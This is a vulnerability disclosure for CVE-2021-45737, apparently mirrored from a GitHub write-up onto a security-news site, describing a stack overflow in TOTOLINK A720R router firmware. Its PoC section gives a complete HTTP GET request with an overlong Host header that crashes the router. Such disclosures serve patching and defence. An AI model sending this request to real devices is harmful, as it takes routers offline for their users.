Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-45737: my_vuln/6.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the Host parameter.

CVE
Open in Source
#vulnerability#web#ubuntu#linux#dos#git

TOTOLINK Vulnerability

Vendor:TOTOLINK

Product:A720R

Version:A720R_Firmware(V4.1.5cu.470_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:[email protected],[email protected]

Vulnerability description

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

Stack Overflow

In lighttpd binary:

In Form_Login function, Host is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the Host to crash the server.

Through the dynamic debugging of gdb, as you can see here, the parameter(a1+272) points to the content of the Host. It will cause the function return address to be overwritten.

Supplement

This type of buffer overflow appears in various places in the lighttpd file.(Host: …)

In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, you can limit the length of this field.

PoC

We set Host as aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa… , then sending GET request such as:

GET /formLoginAuth.htm?action=login&flag=1 HTTP/1.1 Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: SESSION_ID=2:1591953155:2 Upgrade-Insecure-Requests: 1

Result

The target router crashes and cannot provide services correctly and persistently.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE